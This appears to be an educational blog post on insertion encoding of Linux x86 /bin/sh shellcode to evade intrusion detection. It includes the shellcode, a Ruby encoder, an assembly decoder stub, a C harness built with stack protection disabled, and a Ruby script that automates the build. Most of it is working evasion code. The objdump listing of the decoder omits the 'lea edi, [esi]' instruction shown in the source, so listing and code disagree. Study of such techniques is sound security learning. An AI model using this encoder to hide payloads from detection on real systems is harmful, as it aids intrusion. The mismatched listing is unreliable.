Encoder/Decoder Shellcode

According to Wikipedia, intrusion detection systems can detect the signatures of simple shellcode sent over the network, so shellcode is often encoded, made self-decrypting or made polymorphic to avoid detection. This blog post covers one aspect of the first method, encoding, and specifically insertion encoding. Later posts will deal with polymorphic and encrypting/decrypting methods respectively. The insertion encoding method used in this post is simple but effective, and hopefully useful.

What is insertion encoder/decoder shellcode?
It is shellcode that has been obfuscated (encoded) by inserting random and/or garbage bytes into it, and which is then de-obfuscated (decoded) by a decoder stub upon execution. The encoding can be achieved in any number of ways; this blog post describes one of them. To make things a bit clearer, there is a before and after example below.

The examples below use a simple /bin/sh program built on the execve system call, which will be translated into shellcode.

xor     eax, eax
push    eax
push    dword 0x68732f2f
push    dword 0x6e69622f
mov     ebx, esp
push    eax
mov     edx, esp
push    ebx
mov     ecx, esp
mov     al, 0xb
int     0x80

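The shellcode before encoding:

"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"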

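and after, not including any end-of-shellcode markers:

"\x31\xc0\x50\x27\x68\xef\x2f\x2f\x73\x68\xc3\x68\xef\x2f\x62\x69\xc3\x6e\x89\xe3\x50\xef\x89\xe2\x27\x53\x37\x89\xe1\xc3\xb0\x0b\xcd\x80\xc3"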

The above encoded shellcode then disassembles to give the following:

$ echo -ne "\x31\xc0\x50\x27\x68\xef\x2f\x2f\x73\x68\xc3\x68\xef\x2f\x62\x69\xc3\x6e\x89\xe3\x50\xef\x89\xe2\x27\x53\x37\x89\xe1\xc3\xb0\x0b\xcd\x80\xc3" | ndisasm -u -

00000000  31C0              xor eax,eax
00000002  50                push eax
00000003  27                daa
00000004  68EF2F2F73        push dword 0x732f2fef
00000009  68C368EF2F        push dword 0x2fef68c3
0000000E  6269C3            bound ebp,[ecx-0x3d]
00000011  6E                outsb
00000012  89E3              mov ebx,esp
00000014  50                push eax
00000015  EF                out dx,eax
00000016  89E2              mov edx,esp
00000018  27                daa
00000019  53                push ebx
0000001A  37                aaa
0000001B  89E1              mov ecx,esp
0000001D  C3                ret
0000001E  B00B              mov al,0xb
00000020  CD80              int 0x80
00000022  C3                ret

The above code is clearly different from the original, so the desired result has been achieved. The next stage is to remove the encoding at runtime, leaving the original shellcode ready to be executed.

How is encoding achieved?
As mentioned earlier, there are many different solutions. Two guidelines were followed in choosing one: first, the solution must be simple; second, the solution must work. With that said, the solution chosen for this blog post is to pick a random byte from a list and insert it at a random position in the shellcode. The decoder then only needs to remove the bytes that are found in the list.
The encoder is written in Ruby. Please excuse the Ruby code; this is the first time I have used the language and I am pretty sure the code is bad, but it works.

WARNING: The random_insert_bytes list in the code below must NOT contain any byte that also appears in the shellcode. The decoder would remove those valid shellcode bytes as garbage, rendering the decoded shellcode inoperative. For the same reason the end_byte marker must not appear in the shellcode either, otherwise decoding stops early.
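The warning above can be turned into a quick pre-flight check. The following is a minimal sketch, not part of the original script; the helper name conflicting_bytes is hypothetical, and it assumes the same "0x.." string format used for the byte lists in this post.

```ruby
# Hypothetical helper: lists every reserved byte (insertion byte or end
# marker) that would break decoding for the given shellcode.
def conflicting_bytes(sc, rib, eb)
  payload  = sc.map(&:hex)
  garbage  = rib.map(&:hex)
  marker   = eb.hex

  # Reserved bytes that also occur in the real shellcode.
  conflicts = (garbage + [marker]) & payload
  # The end marker must not double as an insertion byte, because the
  # decoder tests the insertion bytes first and would skip the marker.
  conflicts << marker if garbage.include?(marker)

  conflicts.uniq.map { |b| format("0x%02x", b) }
end

shellcode = %w(0x31 0xc0 0x50 0x68 0x2f 0x2f 0x73 0x68 0x68 0x2f 0x62 0x69 0x6e 0x89 0xe3 0x50 0x89 0xe2 0x53 0x89 0xe1 0xb0 0x0b 0xcd 0x80)
random_insert_bytes = %w(0x27 0x37 0xd7 0xef 0xc3)
end_byte = "0xbb"

conflicts = conflicting_bytes(shellcode, random_insert_bytes, end_byte)
warn "unsafe bytes: #{conflicts.join(', ')}" unless conflicts.empty?
```

With the lists used in this post the check reports nothing, since none of the reserved bytes occur in the /bin/sh shellcode.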

def gen_encoded_shellcode(sc, rib, eb)
  puts "[*] Generate random insertion encoded shellcode..."
  encoded = []

  # Create the encoded shellcode. Each pass either inserts a random
  # garbage byte or copies the next original byte, so all of the
  # original shellcode ends up in the output, in order.
  sc_index = 0
  while sc_index <= sc.length
    if rand(1..1000) > 500
      encoded << rib.sample
    else
      encoded << sc[sc_index] if sc_index < sc.length
      sc_index += 1
    end
  end

  # Terminate with the end marker and return a comma separated string.
  (encoded << eb).join(",")
end

shellcode = %w(0x31 0xc0 0x50 0x68 0x2f 0x2f 0x73 0x68 0x68 0x2f 0x62 0x69 0x6e 0x89 0xe3 0x50 0x89 0xe2 0x53 0x89 0xe1 0xb0 0x0b 0xcd 0x80)
random_insert_bytes = %w(0x27 0x37 0xd7 0xef 0xc3)
end_byte = "0xbb"

# main
encoded_shellcode = gen_encoded_shellcode shellcode, random_insert_bytes, end_byte	

To make the encoding a bit more random, the bytes are chosen at random from the list and the positions at which they are inserted are also randomised. At each step a random number between 1 and 1000 is chosen; if it is greater than 500 a random byte from the list is inserted, otherwise the next byte of the original shellcode is written out as normal.

That is all there is to the encoding. It is very simple, and the code presented can be played around with to produce more random results: for example, you could insert two bytes at a time into the shellcode, or use a much larger list of random bytes. As indicated earlier, the next stage is to write a decoder that takes the encoded shellcode and reproduces the original so that it executes successfully.
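As an illustration of the "two bytes at a time" variation mentioned above, here is a minimal sketch. It is not the encoder used in this post: the method name gen_burst_encoded and the burst and rng parameters are hypothetical, and the random number generator is passed in only so that a run can be repeated with a fixed seed.

```ruby
# Hypothetical variation: before each original byte, roughly half the
# time, insert between 1 and `burst` garbage bytes instead of just one.
def gen_burst_encoded(sc, rib, eb, burst: 2, rng: Random.new)
  encoded = []
  sc.each do |byte|
    if rng.rand(1..1000) > 500
      rng.rand(1..burst).times { encoded << rib.sample(random: rng) }
    end
    encoded << byte
  end
  # Same output format as the encoder above: comma separated, end marker last.
  (encoded << eb).join(",")
end

shellcode = %w(0x31 0xc0 0x50 0x68 0x2f 0x2f 0x73 0x68 0x68 0x2f 0x62 0x69 0x6e 0x89 0xe3 0x50 0x89 0xe2 0x53 0x89 0xe1 0xb0 0x0b 0xcd 0x80)
random_insert_bytes = %w(0x27 0x37 0xd7 0xef 0xc3)
end_byte = "0xbb"

puts gen_burst_encoded(shellcode, random_insert_bytes, end_byte, burst: 2)
```

Because the decoder simply drops every byte found in the list, it needs no changes to cope with runs of garbage bytes.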

How is decoding achieved?
Because the encoder inserts bytes from a fixed list, all the decoder needs to do is remove those bytes. This turns out to be quite simple in assembly language and, as will be shown later, lends itself well to automatically generating the entire assembly source.
The decoder below matches the bytes in random_insert_bytes in the Ruby encoder.

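global _start
section .text
_start:
    jmp short call_shellcode
decoder:
    pop esi
    lea edi, [esi]
    xor eax, eax
    xor ebx, ebx
decode:
    mov bl, byte [esi + eax]
    cmp bl, 0x27
    jz  insertionByte
    cmp bl, 0x37
    jz  insertionByte
    cmp bl, 0xd7
    jz  insertionByte
    cmp bl, 0xef
    jz  insertionByte
    cmp bl, 0xc3
    jz  insertionByte
    cmp bl, 0xbb
    jz  short encodedShellcode
    mov byte [edi], bl
    inc edi
    inc eax
    jmp short decode
insertionByte:
    inc eax
    jmp decode
call_shellcode:
    call decoder
    encodedShellcode db 0x31,0xc0,0x50,0x27,0x68,0xef,0x2f,0x2f,0x73,0x68,0xc3,0x68,0xef,0x2f,0x62,0x69,0xc3,0x6e,0x89,0xe3,0x50,0xef,0x89,0xe2,0x27,0x53,0x37,0x89,0xe1,0xc3,0xb0,0x0b,0xcd,0x80,0xc3,0xbb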

Analysis of decoder:
jmp short call_shellcode, call decoder, pop esi,
use the jmp/call/pop technique to load the address of the encoded shellcode into esi.
lea edi, [esi],
load the same address into edi. The decoded bytes are written through edi, so the decoded shellcode overwrites the encoded shellcode in place and can be executed at the encodedShellcode address.
mov bl, byte [esi + eax],
move the byte at read index eax of the encoded shellcode into the bl register, ready for comparing.
cmp bl, <byte> and jz insertionByte pairs,
compare the contents of bl with each byte in the list from the Ruby source code. If bl is equal to a byte from that list, the read index is increased (inc eax at insertionByte) and control is returned to decode. Otherwise the byte is written to the address held in edi (mov byte [edi], bl), the write pointer is increased (inc edi), the read index is increased (inc eax) and control is passed back to decode.
cmp bl, 0xbb and jz short encodedShellcode,
check whether the end of the encoded shellcode has been reached by comparing bl with the end marker, in this case 0xbb. If the end has been reached, control is passed to the encodedShellcode address, which now contains the decoded shellcode.
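The decoder loop analysed above can also be modelled in a few lines of Ruby, which is handy for checking an encoded string before assembling anything. This is only a sketch of the logic, not the stub itself; the method name model_decode is hypothetical, and the sample bytes are the encoded example from earlier in this post with the 0xbb end marker appended.

```ruby
# Ruby model of the decoder stub: walk the encoded bytes, drop every
# insertion byte, stop at the end marker, keep everything else.
def model_decode(encoded, rib, eb)
  garbage = rib.map(&:hex)
  marker  = eb.hex
  decoded = []
  encoded.each do |byte|                  # byte plays the role of bl
    value = byte.hex
    next  if garbage.include?(value)      # jz insertionByte
    break if value == marker              # jz short encodedShellcode
    decoded << byte                       # mov byte [edi], bl
  end
  decoded
end

shellcode = %w(0x31 0xc0 0x50 0x68 0x2f 0x2f 0x73 0x68 0x68 0x2f 0x62 0x69 0x6e 0x89 0xe3 0x50 0x89 0xe2 0x53 0x89 0xe1 0xb0 0x0b 0xcd 0x80)
random_insert_bytes = %w(0x27 0x37 0xd7 0xef 0xc3)
end_byte = "0xbb"
encoded = %w(0x31 0xc0 0x50 0x27 0x68 0xef 0x2f 0x2f 0x73 0x68 0xc3 0x68 0xef 0x2f 0x62 0x69 0xc3 0x6e 0x89 0xe3 0x50 0xef 0x89 0xe2 0x27 0x53 0x37 0x89 0xe1 0xc3 0xb0 0x0b 0xcd 0x80 0xc3 0xbb)

decoded = model_decode(encoded, random_insert_bytes, end_byte)
puts decoded == shellcode ? "round trip ok" : "round trip FAILED"
```

The model checks the insertion bytes before the end marker, in the same order as the assembly, so it fails in the same way as the stub if the two byte sets overlap.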

As you can see, this is a very simple but effective method of encoding shellcode. It is also flexible, in that more random bytes can be added; the downside is that the decoder grows in proportion to the number of random bytes added.

So does the code fulfil the second guideline: does it work?

Build encoder/decoder:
$ nasm -felf32 -o encoder.o encoder.asm
$ ld -o encoder encoder.o

Check for nulls:
$ objdump -D encoder -M intel

encoder:     file format elf32-i386
Disassembly of section .text:

08048060 <_start>:
 8048060:	eb 2f                	jmp    8048091 <call_shellcode>
08048062 <decoder>:
 8048062:	5e                   	pop    esi
 8048063:	31 c0                	xor    eax,eax
 8048065:	31 db                	xor    ebx,ebx
08048067 <decode>:
 8048067:	8a 1c 06             	mov    bl,BYTE PTR [esi+eax*1]
 804806a:	80 fb 27             	cmp    bl,0x27
 804806d:	74 1f                	je     804808e <insertionByte>
 804806f:	80 fb 37             	cmp    bl,0x37
 8048072:	74 1a                	je     804808e <insertionByte>
 8048074:	80 fb d7             	cmp    bl,0xd7
 8048077:	74 15                	je     804808e <insertionByte>
 8048079:	80 fb ef             	cmp    bl,0xef
 804807c:	74 10                	je     804808e <insertionByte>
 804807e:	80 fb c3             	cmp    bl,0xc3
 8048081:	74 0b                	je     804808e <insertionByte>
 8048083:	80 fb bb             	cmp    bl,0xbb
 8048086:	74 0e                	je     8048096 <encodedShellcode>
 8048088:	88 1f                	mov    BYTE PTR [edi],bl
 804808a:	47                   	inc    edi
 804808b:	40                   	inc    eax
 804808c:	eb d9                	jmp    8048067 <decode>
0804808e <insertionByte>:
 804808e:	40                   	inc    eax
 804808f:	eb d6                	jmp    8048067 <decode>
08048091 <call_shellcode>:
 8048091:	e8 cc ff ff ff       	call   8048062 <decoder>
08048096 <encodedShellcode>:
 8048096:	31 c0                	xor    eax,eax
 8048098:	50                   	push   eax
 8048099:	27                   	daa
 804809a:	68 ef 2f 2f 73       	push   0x732f2fef
 804809f:	68 c3 68 ef 2f       	push   0x2fef68c3
 80480a4:	62 69 c3             	bound  ebp,QWORD PTR [ecx-0x3d]
 80480a7:	6e                   	outs   dx,BYTE PTR ds:[esi]
 80480a8:	89 e3                	mov    ebx,esp
 80480aa:	50                   	push   eax
 80480ab:	ef                   	out    dx,eax
 80480ac:	89 e2                	mov    edx,esp
 80480ae:	27                   	daa
 80480af:	53                   	push   ebx
 80480b0:	37                   	aaa
 80480b1:	89 e1                	mov    ecx,esp
 80480b3:	c3                   	ret
 80480b4:	b0 0b                	mov    al,0xb
 80480b6:	cd 80                	int    0x80
 80480b8:	c3                   	ret
 80480b9:	bb                   	.byte 0xbb
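Reading the disassembly by eye for null bytes gets tedious as the byte lists grow. The following is a small sketch of the same check in Ruby; the helper name null_byte_offsets is hypothetical, and it assumes the shellcode is available as text in the "\x.." form produced by the extraction step later in this post.

```ruby
# Hypothetical helper: returns the offsets of any 0x00 bytes in a
# string of literal \xNN escapes (backslash, x, two hex digits).
def null_byte_offsets(escaped)
  bytes = escaped.scan(/\\x(\h{2})/).flatten
  bytes.each_index.select { |i| bytes[i] == "00" }
end

# Single quotes keep the backslashes literal, as they would be when
# read from a file or from the output of another command.
stub_start = '\xeb\x2f\x5e\x31\xc0\x31\xdb'
offsets = null_byte_offsets(stub_start)
puts offsets.empty? ? "no null bytes" : "null bytes at offsets #{offsets.inspect}"
```

An empty result means the string can be passed through C string handling without being cut short.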

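Because the decoder rewrites the shellcode in place and the .text section of the standalone binary is read-only, the assembly language binary cannot be tested on its own; the shellcode must be hosted within a process that keeps it in writable, executable memory. First the shellcode must be extracted from the binary.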

Get shellcode from executable:
Use the following one-liner from the commandlinefu website, with PROGRAM replaced by the name of the required executable (here, encoder):

$ objdump -d ./encoder | grep '[0-9a-f]:' | grep -v 'file' | cut -f2 -d: | cut -f1-6 -d' ' | tr -s ' ' | tr '\t' ' ' | sed 's/ $//g' | sed 's/ /\\x/g' | paste -d '' -s | sed 's/^/"/' | sed 's/$/"/g'
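For readers who would rather stay in Ruby, the same extraction can be sketched as a small parser over the text that objdump -d prints. This is an illustration only: the method names bytes_from_objdump and to_c_escapes are hypothetical, and the parser assumes the tab separated layout shown in the listing above (address, raw bytes, mnemonic).

```ruby
# Pull the raw byte column out of `objdump -d` text. Label lines and
# headers have no tab separated byte column and are skipped.
def bytes_from_objdump(text)
  text.each_line.flat_map do |line|
    address, raw_bytes = line.split("\t")
    next [] unless raw_bytes && address =~ /\A\s*\h+:\z/
    raw_bytes.scan(/\b\h{2}\b/)
  end
end

# Format the bytes as literal \xNN escapes for a C string.
def to_c_escapes(bytes)
  bytes.map { |b| "\\x#{b}" }.join
end

sample = [
  "08048060 <_start>:",
  " 8048060:\teb 2f                \tjmp    8048091 <call_shellcode>",
  "08048062 <decoder>:",
  " 8048062:\t5e                   \tpop    esi"
].join("\n")

puts to_c_escapes(bytes_from_objdump(sample))
```

In practice the text would come from running objdump on the built binary rather than from a hard-coded sample.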

Using the shellcode above, the following C program will be used to test that it works as required.

#include <stdio.h>

unsigned char code[] = /* extracted shellcode string goes here */;

int main(void)
{
    int (*ret)() = (int(*)())code;
    ret();
    return 0;
}

Build the code:
$ gcc -fno-stack-protector -z execstack -o shellcode shellcode.c
The options for gcc are to disable stack protection and enable stack execution respectively. Without these options the code will cause a segfault.

Test the shellcode:
$ ./shellcode
If successful, the code will spawn a new shell using /bin/sh.

Analysis of shellcode:
In the analysis of the shellcode a picture is worth a thousand words, or at the very least an execution flowchart is.
The following graphic was created using the sctest tool included in the libemu package. It is a very valuable tool in shellcode analysis and should be part of any programmer's toolkit.

The following commands were issued to create the graphic below:
$ echo -ne "\x31\xc0\x50\x27\x68\xef\x2f\x2f\x73\x68\xc3\x68\xef\x2f\x62\x69\xc3\x6e\x89\xe3\x50\xef\x89\xe2\x27\x53\x37\x89\xe1\xc3\xb0\x0b\xcd\x80\xc3" | sctest -vv -Ss 100000 -G shellcode.dot
$ dot shellcode.dot -Tpng -o shellcode.png


The graphic above is also a testament to the simplicity of the code. The method has proved successful, so with more research and development effort more complex and useful encoder/decoders can be built from this base. For instance, making a polymorphic version of the decoder is straightforward; as an example, it would be simple to use a loop that scans an address range for the garbage bytes. Polymorphic and encrypting/decrypting shellcode will be the subject of future blog posts.

Development methodology:
Having never used Ruby for development before, I felt it would be useful to try it during this assignment. It was relatively easy to pick up and use; I am probably not using it correctly, but I got things working nonetheless. Given the simple design of the encoder/decoder, experiments would be quicker if they could be automated, using Ruby to write the assembly language code and the C test code and to build the test binary. Again, the code is probably very bad, but it worked very well and allowed for rapid prototyping and testing of different encoding schemes.

The Ruby script used for development is below.

#!/usr/bin/ruby -w

# Parameters
# (string array of hex format bytes) sc 
#   shellcode to be encoded
# (string array of hex format bytes) rib 
#   bytes to be inserted randomly into shellcode
# (string) eb 
#   end byte marker for shellcode
# Returns
# (string)
#   shellcode that has been encoded
def gen_encoded_shellcode(sc, rib, eb)
  puts "[*] Generate random insertion encoded shellcode..."
  encoded = []

  # Create the encoded shellcode. Each pass either inserts a random
  # garbage byte or copies the next original byte, so all of the
  # original shellcode ends up in the output, in order.
  sc_index = 0
  while sc_index <= sc.length
    if rand(1..1000) > 500
      encoded << rib.sample
    else
      encoded << sc[sc_index] if sc_index < sc.length
      sc_index += 1
    end
  end

  # Terminate with the end marker and return a comma separated string.
  (encoded << eb).join(",")
end

# Parameters
# (string) esc 
#   encoded shellcode returned from generate_encoded_shellcode method
# (string array of hex format bytes) rib 
#   bytes to be inserted randomly into shellcode
# (string) eb
#   end byte marker for shellcode, must be same as used in 
#   generate_encoded_shellcode method
# (string) fn
#   filename for generated assembly language source code
def gen_asm_code(esc, rib, eb, fn)
  puts "[*] Generate assembly language for encoded shellcode..."
  fn = fn + ".asm"
  asmcode_header = [
    "global _start",
    "section .text",
    "_start:",
    "    jmp short call_shellcode",
    "decoder:",
    "    pop esi",
    "    lea edi, [esi]",
    "    xor eax, eax",
    "    xor ebx, ebx",
    "decode:",
    "    mov bl, byte [esi + eax]"
  ]

  # one cmp/jz pair per insertion byte
  asmcode_decode = []
  rib.each do |x|
    asmcode_decode << "    cmp bl, #{x}"
    asmcode_decode << "    jz  insertionByte"
  end

  asmcode_footer = [
    "    cmp bl, #{eb}",
    "    jz  short encodedShellcode",
    "    mov byte [edi], bl",
    "    inc edi",
    "    inc eax",
    "    jmp short decode",
    "insertionByte:",
    "    inc eax",
    "    jmp decode",
    "call_shellcode:",
    "    call decoder",
    "    encodedShellcode db #{esc}"
  ]

  final_asmcode = []
  final_asmcode << asmcode_header
  final_asmcode << asmcode_decode
  final_asmcode << asmcode_footer

  # puts flattens the nested arrays and writes one line per element
  File.open(fn, "w+") do |fsrc|
    fsrc.puts final_asmcode
  end

  puts "[*] Finished writing assembly language source code to #{fn}."
end

# Parameters
# (string) fn
#   name of assembly executable
def build_assembly_executable(fn)
  puts "[*] Building assembly executable, #{fn}..."

  exit_status = 0
  Open3.popen3("nasm -felf32 -o #{fn}.o #{fn}.asm") { |i,o,e,t|
    exit_status = t.value
  }
  Open3.popen3("ld -o #{fn} #{fn}.o") { |i,o,e,t|
    exit_status = t.value
  }
  return exit_status
end

# Parameters
# (string) fn
#   name of assembly executable
# (string) cmd
#   command to execute from shell
# Returns
#   (string)
#   shellcode extracted from assembly executable
def extract_shellcode_from_binary(fn, cmd)
  puts "[*] Extracting shellcode from executable file, #{fn}..."

  extracted_shellcode = ""
  exit_status = 0
  Open3.popen3("./#{cmd} #{fn}") { |i,o,e,t|
    # read everything the extraction script prints to stdout
    extracted_shellcode = o.gets(nil)
    exit_status = t.value
  }

  return extracted_shellcode
end

# build c language shellcode template, insert encodedshellcode
# Parameters
# (string) cfn
#   C source filename
# (string) es
#   shellcode extracted from assembly executable
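def gen_shellcode_template(cfn, es)
  puts "[*] Generating shellcode template C source file..."
  cfn += ".c"
  # wrap the extracted bytes in quotes to form a C string literal
  sc = "\"#{es}\";"
  ctemplate = [
    "#include <stdio.h>",
    "unsigned char code[] = ",
    sc,
    "int main(void)",
    "{",
    "    int (*ret)() = (int(*)())code;",
    "    ret();",
    "    return 0;",
    "}"
  ]

  File.open(cfn, "w+") do |cfsrc|
    cfsrc.puts ctemplate
  end
end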

# Parameters
# (string) cfn
#   c executable filename
def build_shellcode_binary(cfn)
  puts "[*] Building shellcode binary..."
  exit_status = 0
  Open3.popen3("gcc -fno-stack-protector -z execstack -ggdb -o #{cfn} #{cfn}.c") { |i,o,e,t|
    exit_status = t.value
  }
  return exit_status
end

# Parameters
# (string) cfn
#   c executable filename
def test_shellcode(cfn)
  puts "[*] Finished!"
  puts "\n./#{cfn} to test, /bin/sh on success... (Good luck!)\n\n"
end

# required modules
require "open3"

# variables for shellcode generation
asmfilename = "EncodedShellcode"
cfilename = "Shellcode"
shellcode = %w(0x31 0xc0 0x50 0x68 0x2f 0x2f 0x73 0x68 0x68 0x2f 0x62 0x69 0x6e 0x89 0xe3 0x50 0x89 0xe2 0x53 0x89 0xe1 0xb0 0x0b 0xcd 0x80)
random_insert_bytes = %w(0x27 0x37 0xd7 0xef 0xc3)
end_byte = "0xbb"
extract_shellcode_cmd = "extract_shellcode.sh"

# main 
encoded_shellcode = gen_encoded_shellcode shellcode, random_insert_bytes, end_byte	
gen_asm_code encoded_shellcode, random_insert_bytes, end_byte, asmfilename
build_assembly_executable asmfilename
extracted_shellcode = extract_shellcode_from_binary asmfilename, extract_shellcode_cmd
gen_shellcode_template cfilename, extracted_shellcode
build_shellcode_binary cfilename
test_shellcode cfilename

A simple script, named extract_shellcode.sh, was used to extract the shellcode from a binary and print it to standard output, where it is read by the above code and placed into the C test file.

#!/usr/bin/env sh
for i in $(objdump -d "$1" | tr '\t' ' ' | tr ' ' '\n' | grep -E '^[0-9a-f]{2}$') ; do printf '\\x%s' "$i" ; done
